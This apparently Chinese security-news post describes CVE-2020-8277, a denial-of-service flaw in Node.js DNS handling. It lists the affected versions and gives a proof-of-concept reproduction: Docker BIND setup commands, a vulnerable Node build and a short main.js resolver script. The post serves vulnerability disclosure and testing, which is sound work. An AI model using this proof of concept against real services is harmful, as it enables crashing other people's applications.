# CVE-2020-8277:Node.js通过DNS请求实现拒绝服务
近日,Node.js官方发布最新安全版本公告,披露在v12.x,v14.x和v15.x 相应的Node.js版本中存在一处高风险的拒绝服务漏洞(CVE-2020-8277)。受影响的Node.js应用允许攻击者对目标主机发送DNS请求,利用Node.js应用解析大量响应的DNS记录来对目标主机实现拒绝服务攻击。
影响版本:
* Node.js 12.x: 12.16.3-12.19.1
* Node.js 14.x: 14.13.0-14.15.1
* Node.js 15.x全部版本
Quick Run:
“`bash
# clone this repository
$ git clone https://github.com/masahiro331/CVE-2020-8277
# run bind
$ docker build -t bind-local ./bind
# Need TCP fallback
$ docker run –rm –name bind -it -p 53:53 -p 53:53/udp bind
# use “< v15.2.1" version
# If you use fixed version, build node.
$ git clone https://github.com/nodejs/node
$ git checkout df211208c0
$ ./configure
$ make -j8
$ make install
# Run PoC
$ node main.js
```
main.js:
```js
// const SegfaultHandler = require('segfault-handler');
// SegfaultHandler.registerHandler('crash.log');
const { Resolver } = require('dns');
const resolver = new Resolver();
resolver.setServers(['127.0.0.1']);
x = 0
resolver.resolve4('safe.masahiro331.com', (err, addresses) => {
while (x < 1000) {
console.log(x);
console.log(addresses[x])
x += 1;
}
console.log(err);
});
```
ref:
https://github.com/masahiro331/CVE-2020-8277
https://www.safedog.cn/news.html?id=4599
https://forum.ywhack.com/thread-114728-1-4.html
请登录后查看评论内容